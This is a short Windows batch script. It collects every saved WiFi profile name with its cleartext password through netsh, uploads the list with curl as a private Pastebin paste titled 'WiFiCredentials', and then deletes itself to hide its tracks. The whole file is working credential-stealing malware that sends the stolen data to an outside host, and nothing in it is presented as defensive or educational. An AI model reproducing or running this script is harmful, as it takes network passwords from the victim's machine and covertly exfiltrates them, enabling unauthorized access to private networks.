@echo off
setlocal enabledelayedexpansion

set "wifi_list="

for /f "tokens=2 delims=:" %%A in ('netsh wlan show profiles ^| findstr "All User Profile"') do (
    set "profile_name=%%A"

    set "profile_name=!profile_name:~1!"
    set "key_content="

    for /f "delims=" %%B in ('netsh wlan show profile name^="!profile_name!" key^=clear') do (
        echo %%B | findstr /c:"Key Content" >nul
        if not errorlevel 1 (
            for /f "tokens=2 delims=:" %%C in ("%%B") do (
                set "key_content=%%C"
                set "key_content=!key_content:~1!"
            )
        )
    )

    if defined key_content (
        set "wifi_list=!wifi_list!!profile_name! - !key_content!^|"
    )
)

if defined wifi_list (
    set "wifi_list=!wifi_list:~0,-1!"
) else (
    pause
    exit /b
)

curl -X POST ^
    -d "api_dev_key={PASTEBIN_KEY}" ^
    -d "api_user_key={PASTEBIN_KEY}" ^
    -d "api_option=paste" ^
    -d "api_paste_code=!wifi_list!" ^
    -d "api_paste_private=1" ^
    -d "api_paste_name=WiFiCredentials" ^
    -d "api_paste_expire_date=N" ^
    "https://pastebin.com/api/api_post.php"


timeout /t 1 >nul
del "%~f0"
exit /b
